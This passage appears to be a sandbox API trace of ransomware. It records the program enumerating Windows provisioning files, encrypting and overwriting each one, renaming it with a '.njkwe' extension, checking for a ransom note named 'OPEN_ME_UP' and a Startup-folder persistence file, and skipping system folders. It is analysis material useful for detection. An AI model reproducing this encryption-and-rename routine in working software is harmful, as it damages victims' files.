(lpString1="210__Connections_Cellular_Pelephone (Israel)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0077.334] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\210__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0077.334] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\210__Connections_Cellular_Pelephone (Israel)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\210__connections_cellular_pelephone (israel)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0077.334] GetTickCount () returned 0x1153ab4 [0077.334] GetTickCount () returned 0x1153ab4 [0077.334] GetTickCount () returned 0x1153ab4 [0077.334] GetTickCount () returned 0x1153ab4 [0077.334] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0077.334] GetProcessHeap () returned 0xbe0000 [0077.334] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc51868 [0077.334] ReadFile (in: hFile=0x43c, lpBuffer=0xc51868, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesRead=0x380edc4*=0x354, lpOverlapped=0x0) returned 1 [0077.336] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffcac, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0077.336] WriteFile (in: hFile=0x43c, lpBuffer=0xc51868*, nNumberOfBytesToWrite=0x354, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesWritten=0x380edc4*=0x354, lpOverlapped=0x0) returned 1 [0077.336] GetProcessHeap () returned 0xbe0000 [0077.336] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc51868 | out: hHeap=0xbe0000) returned 1 [0077.336] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0077.336] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0077.336] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0077.336] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0077.336] CloseHandle (hObject=0x43c) returned 1 [0077.336] GetProcessHeap () returned 0xbe0000 [0077.336] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0077.336] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\210__Connections_Cellular_Pelephone (Israel)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 182 [0077.336] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\210__Connections_Cellular_Pelephone (Israel)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\210__connections_cellular_pelephone (israel)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\210__Connections_Cellular_Pelephone (Israel)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\210__connections_cellular_pelephone (israel)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0077.337] GetProcessHeap () returned 0xbe0000 [0077.337] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0077.337] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x907cb89c, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x907cb89c, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x907cb89c, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x1ce, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="211__Cellular_PerSimSettings_$(__ICCID)_AccountExperienceURL.provxml", cAlternateFileName="211__C~1.PRO")) returned 1 [0077.337] lstrcmpiW (lpString1="211__Cellular_PerSimSettings_$(__ICCID)_AccountExperienceURL.provxml", lpString2="Windows") returned -1 [0077.337] lstrcmpiW (lpString1="211__Cellular_PerSimSettings_$(__ICCID)_AccountExperienceURL.provxml", lpString2="$Recycle.bin") returned 1 [0077.337] lstrcmpiW (lpString1="211__Cellular_PerSimSettings_$(__ICCID)_AccountExperienceURL.provxml", lpString2="System Volume Information") returned -1 [0077.337] lstrcmpiW (lpString1="211__Cellular_PerSimSettings_$(__ICCID)_AccountExperienceURL.provxml", lpString2="Program Files") returned -1 [0077.337] lstrcmpiW (lpString1="211__Cellular_PerSimSettings_$(__ICCID)_AccountExperienceURL.provxml", lpString2="Program Files (x86)") returned -1 [0077.337] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\211__Cellular_PerSimSettings_$(__ICCID)_AccountExperienceURL.provxml") returned 162 [0077.337] StrStrIW (lpFirst="211__Cellular_PerSimSettings_$(__ICCID)_AccountExperienceURL.provxml", lpSrch=".njkwe") returned 0x0 [0077.337] lstrcmpW (lpString1="211__Cellular_PerSimSettings_$(__ICCID)_AccountExperienceURL.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0077.337] lstrcmpW (lpString1="211__Cellular_PerSimSettings_$(__ICCID)_AccountExperienceURL.provxml", lpString2="taridd") returned -1 [0077.337] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\211__Cellular", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0077.337] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\211__Cellular_PerSimSettings_$(__ICCID)_AccountExperienceURL.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\211__cellular_persimsettings_$(__iccid)_accountexperienceurl.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0077.338] GetTickCount () returned 0x1153ab4 [0077.338] GetTickCount () returned 0x1153ab4 [0077.338] GetTickCount () returned 0x1153ab4 [0077.338] GetTickCount () returned 0x1153ab4 [0077.338] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0077.338] GetProcessHeap () returned 0xbe0000 [0077.338] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc51868 [0077.338] ReadFile (in: hFile=0x43c, lpBuffer=0xc51868, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesRead=0x380edc4*=0x1ce, lpOverlapped=0x0) returned 1 [0077.339] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffe32, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0077.339] WriteFile (in: hFile=0x43c, lpBuffer=0xc51868*, nNumberOfBytesToWrite=0x1ce, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesWritten=0x380edc4*=0x1ce, lpOverlapped=0x0) returned 1 [0077.339] GetProcessHeap () returned 0xbe0000 [0077.339] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc51868 | out: hHeap=0xbe0000) returned 1 [0077.339] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0077.339] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0077.340] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0077.340] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0077.340] CloseHandle (hObject=0x43c) returned 1 [0077.340] GetProcessHeap () returned 0xbe0000 [0077.340] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0077.340] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\211__Cellular_PerSimSettings_$(__ICCID)_AccountExperienceURL.provxml_r00t_{3sXlE5}.njkwe") returned 182 [0077.340] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\211__Cellular_PerSimSettings_$(__ICCID)_AccountExperienceURL.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\211__cellular_persimsettings_$(__iccid)_accountexperienceurl.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\211__Cellular_PerSimSettings_$(__ICCID)_AccountExperienceURL.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\211__cellular_persimsettings_$(__iccid)_accountexperienceurl.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0077.341] GetProcessHeap () returned 0xbe0000 [0077.341] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0077.341] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x907cb89c, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x907cb89c, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x907cb89c, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x2be, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="212__Connections_Cellular_TIM (Italy)_i0$(__MVID)@WAP.provxml", cAlternateFileName="212__C~1.PRO")) returned 1 [0077.341] lstrcmpiW (lpString1="212__Connections_Cellular_TIM (Italy)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0077.341] lstrcmpiW (lpString1="212__Connections_Cellular_TIM (Italy)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0077.341] lstrcmpiW (lpString1="212__Connections_Cellular_TIM (Italy)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0077.341] lstrcmpiW (lpString1="212__Connections_Cellular_TIM (Italy)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0077.341] lstrcmpiW (lpString1="212__Connections_Cellular_TIM (Italy)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0077.341] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\212__Connections_Cellular_TIM (Italy)_i0$(__MVID)@WAP.provxml") returned 155 [0077.341] StrStrIW (lpFirst="212__Connections_Cellular_TIM (Italy)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0077.341] lstrcmpW (lpString1="212__Connections_Cellular_TIM (Italy)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0077.341] lstrcmpW (lpString1="212__Connections_Cellular_TIM (Italy)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0077.341] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\212__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0077.341] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\212__Connections_Cellular_TIM (Italy)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\212__connections_cellular_tim (italy)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0077.341] GetTickCount () returned 0x1153ab4 [0077.341] GetTickCount () returned 0x1153ab4 [0077.341] GetTickCount () returned 0x1153ab4 [0077.341] GetTickCount () returned 0x1153ab4 [0077.341] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0077.341] GetProcessHeap () returned 0xbe0000 [0077.341] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc51868 [0077.342] ReadFile (in: hFile=0x43c, lpBuffer=0xc51868, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesRead=0x380edc4*=0x2be, lpOverlapped=0x0) returned 1 [0077.343] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd42, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0077.343] WriteFile (in: hFile=0x43c, lpBuffer=0xc51868*, nNumberOfBytesToWrite=0x2be, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesWritten=0x380edc4*=0x2be, lpOverlapped=0x0) returned 1 [0077.343] GetProcessHeap () returned 0xbe0000 [0077.343] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc51868 | out: hHeap=0xbe0000) returned 1 [0077.343] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0077.343] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0077.343] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0077.343] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0077.344] CloseHandle (hObject=0x43c) returned 1 [0077.344] GetProcessHeap () returned 0xbe0000 [0077.344] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0077.344] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\212__Connections_Cellular_TIM (Italy)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 175 [0077.344] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\212__Connections_Cellular_TIM (Italy)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\212__connections_cellular_tim (italy)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\212__Connections_Cellular_TIM (Italy)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\212__connections_cellular_tim (italy)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0077.344] GetProcessHeap () returned 0xbe0000 [0077.344] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0077.344] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x907f1b04, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x907f1b04, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x907f1b04, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x1cc, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="213__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", cAlternateFileName="213__C~1.PRO")) returned 1 [0077.344] lstrcmpiW (lpString1="213__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="Windows") returned -1 [0077.344] lstrcmpiW (lpString1="213__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="$Recycle.bin") returned 1 [0077.344] lstrcmpiW (lpString1="213__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="System Volume Information") returned -1 [0077.345] lstrcmpiW (lpString1="213__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="Program Files") returned -1 [0077.345] lstrcmpiW (lpString1="213__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="Program Files (x86)") returned -1 [0077.345] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\213__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml") returned 147 [0077.345] StrStrIW (lpFirst="213__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpSrch=".njkwe") returned 0x0 [0077.345] lstrcmpW (lpString1="213__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0077.345] lstrcmpW (lpString1="213__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="taridd") returned -1 [0077.345] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\213__Cellular", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0077.345] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\213__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\213__cellular_persimsettings_$(__iccid)_appid.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0077.345] GetTickCount () returned 0x1153ac3 [0077.345] GetTickCount () returned 0x1153ac3 [0077.345] GetTickCount () returned 0x1153ac3 [0077.345] GetTickCount () returned 0x1153ac3 [0077.345] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0077.345] GetProcessHeap () returned 0xbe0000 [0077.345] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc51868 [0077.345] ReadFile (in: hFile=0x43c, lpBuffer=0xc51868, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesRead=0x380edc4*=0x1cc, lpOverlapped=0x0) returned 1 [0077.346] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffe34, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0077.346] WriteFile (in: hFile=0x43c, lpBuffer=0xc51868*, nNumberOfBytesToWrite=0x1cc, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesWritten=0x380edc4*=0x1cc, lpOverlapped=0x0) returned 1 [0077.347] GetProcessHeap () returned 0xbe0000 [0077.347] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc51868 | out: hHeap=0xbe0000) returned 1 [0077.347] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0077.347] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0077.348] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0077.348] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0077.348] CloseHandle (hObject=0x43c) returned 1 [0077.348] GetProcessHeap () returned 0xbe0000 [0077.348] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0077.348] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\213__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml_r00t_{3sXlE5}.njkwe") returned 167 [0077.348] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\213__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\213__cellular_persimsettings_$(__iccid)_appid.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\213__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\213__cellular_persimsettings_$(__iccid)_appid.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0077.349] GetProcessHeap () returned 0xbe0000 [0077.349] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0077.349] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x907f1b04, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x907f1b04, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x907f1b04, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x2cd, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="214__Connections_Cellular_Vodafone IT (Italy)_i0$(__MVID)@WAP.provxml", cAlternateFileName="214__C~1.PRO")) returned 1 [0077.349] lstrcmpiW (lpString1="214__Connections_Cellular_Vodafone IT (Italy)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0077.349] lstrcmpiW (lpString1="214__Connections_Cellular_Vodafone IT (Italy)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0077.349] lstrcmpiW (lpString1="214__Connections_Cellular_Vodafone IT (Italy)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0077.349] lstrcmpiW 